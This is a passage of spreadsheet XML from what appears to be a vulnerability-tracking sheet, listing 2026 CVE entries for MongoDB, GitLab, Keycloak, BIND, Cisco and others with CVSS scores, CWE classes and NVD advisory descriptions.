      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr"/>
      <c r="Q567" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's LDAP authorization integration where pooled LDAP connections can retain stale authentication identities after user authentication under certain configurations. Subsequent authorization queries may execute under an unintended LDAP identity rather than the expected one. This can result in incorrect role assignments based on the LDAP directory's access control configuration, potentially allowing an authenticated user to acquire elevated privileges that were not intended by the deployment's authorization policy.</t>
        </is>
      </c>
      <c r="S567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85197</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr"/>
      <c r="Q568" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in libsoup. A malicious HTTP/2 server or a Man-in-the-Middle (MITM) attacker can exploit a heap use-after-free vulnerability in the HTTP/2 client implementation. This occurs when a GNOME application uploads a file using HTTP/2, and the server sends a GOAWAY frame while the file body is being read asynchronously. This can lead to memory corruption, potentially resulting in information disclosure or arbitrary code execution.</t>
        </is>
      </c>
      <c r="S568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85197</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92465</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr"/>
      <c r="Q569" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Themeum WP Mega Menu allows Blind SQL Injection.
This issue affects WP Mega Menu: from n/a through 1.4.2.</t>
        </is>
      </c>
      <c r="S569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92465</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92616</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr"/>
      <c r="Q570" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>FileRise before version 3.28.0 contains a privilege escalation vulnerability that allows authenticated low-privilege attackers to gain unauthorized read and write access by exploiting improper session isolation between the WebDAV interface and the web application session context. Attackers can combine valid Basic-Auth credentials with an active admin PHPSESSID cookie to bypass authorization boundaries, as the WebDAV layer incorrectly inherits elevated privileges from an ambient web session rather than enforcing independent stateless authentication per RFC 4918.</t>
        </is>
      </c>
      <c r="S570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92616</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92779</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr"/>
      <c r="Q571" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>Builder.io Gen2 SDKs through versions 5.2.11 and 0.25.13 contain a prototype pollution vulnerability in the deep-set helper function that processes content block bindings without validation. Attackers can craft content blocks with binding keys containing __proto__, prototype, or constructor paths to pollute Object.prototype during rendering, affecting all subsequent objects created in the process including other tenants' renders.</t>
        </is>
      </c>
      <c r="S571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92779</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14871</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr"/>
      <c r="Q572" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4.6 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an unauthenticated user to cause denial of service due to improper resource allocation limits in the GraphQL complexity calculation logic.</t>
        </is>
      </c>
      <c r="S572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14871</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-1168</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr"/>
      <c r="Q573" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4.6 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an unauthenticated user to cause denial of service due to improper resource allocation limits in the GraphQL complexity calculation logic.</t>
        </is>
      </c>
      <c r="S573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-1168</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13260</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr"/>
      <c r="Q574" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>IBM Verify Identity Access could allow a remote attacker to cause a denial of service due to insufficient validation of incoming request resources.</t>
        </is>
      </c>
      <c r="S574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13260</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15955</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr"/>
      <c r="Q575" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 11.5.0 through 11.5.9, and 12.1.0 through 12.1.5 could allow a remote attacker to perform an arbitrary file write due to improper validation of file paths.</t>
        </is>
      </c>
      <c r="S575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15955</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17615</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr"/>
      <c r="Q576" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in RESTEasy's SourceProvider. This vulnerability allows an unauthenticated attacker to perform an unauthenticated remote file read. By sending a specially crafted XML body with a DOCTYPE declaration referencing external entities to an endpoint that accepts application/xml and returns Source or StreamSource, the server can be tricked into resolving the entity and including sensitive file contents in the HTTP response. This is due to the SourceProvider.writeTo() method creating a SAXParser without disabling external entity resolution, leading to an XML External Entity (XXE) vulnerability.</t>
        </is>
      </c>
      <c r="S576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17615</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18212</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr"/>
      <c r="Q577" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the SAML Redirect Binding implementation of Keycloak, an open-source identity and access management solution. The issue occurs because the custom DEFLATE compression and decompression helpers fail to release native zlib memory after use. An unauthenticated attacker can exploit this by sending repeated malformed SAML requests, leading to native memory exhaustion and a denial of service.</t>
        </is>
      </c>
      <c r="S577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18212</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19290</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr"/>
      <c r="Q578" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>IBM Sterling File Gateway 6.2.0.0 through 6.2.0.6_1, 6.2.1.0 - 6.2.1.2, 6.2.2.0 - 6.2.2.1 could allow a remote attacker to obtain sensitive information due to improper access control.</t>
        </is>
      </c>
      <c r="S578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19290</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19534</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr"/>
      <c r="Q579" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-252</t>
        </is>
      </c>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>undici's WebSocket client crashes the whole Node.js process during the opening handshake when a server responds with a subprotocol that the client never requested. A default WebSocket connection sends no subprotocol, but if the server's 101 response includes a Sec-WebSocket-Protocol header, undici dereferences a null value while checking it against the requested list and throws an uncaught TypeError. Because that code runs inside a microtask with no surrounding error handling, the exception propagates and terminates the process under Node's default behavior, instead of gracefully failing the connection as required by the WebSocket protocol. Any application that opens a WebSocket to an attacker-controlled or compromised server, or over a plaintext connection subject to a machine-in-the-middle, can be crashed remotely without authentication in the default configuration. This affects undici versions from 6.7.0 up to 6.28.1, from 7.0.0 up to 7.29.1, and from 8.0.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="S579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19534</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19666</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr"/>
      <c r="Q580" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>On a resolver configured to use ``dns64``, if an applicable answer from the authoritative server is malformed in a specific way, the resolver `named` process will exit unexpectedly.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19666</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19667</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr"/>
      <c r="Q581" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>If an attacker-controlled authoritative server can produce a negative answer that is exactly 65536 bytes, then a flaw in `named` results in a negative cache entry of 0 bytes. When this entry is subsequently read, `named` aborts.
This issue affects BIND 9 versions 9.11.0 through 9.18.50, 9.20.0 through 9.20.27, 9.21.0 through 9.21.25, 9.11.3-S1 through 9.18.50-S1, and 9.20.9-S1 through 9.20.27-S1.</t>
        </is>
      </c>
      <c r="S581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19667</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20247</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr"/>
      <c r="Q582" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an unauthenticated, remote attacker to conduct SQL injection attacks on an affected device.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to modify data in the underlying database.</t>
        </is>
      </c>
      <c r="S582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20247</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20343</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr"/>
      <c r="Q583" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in a critical API for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to download sensitive files and use unbounded disk space.
This vulnerability exists because a critical API lacks authentication.&amp;nbsp;An attacker could exploit this vulnerability by repeatedly invoking the API. A successful exploit could allow the attacker to download sensitive files that should be restricted and consume disk space so the device could become unresponsive, causing a DoS condition.</t>
        </is>
      </c>
      <c r="S583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20343</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
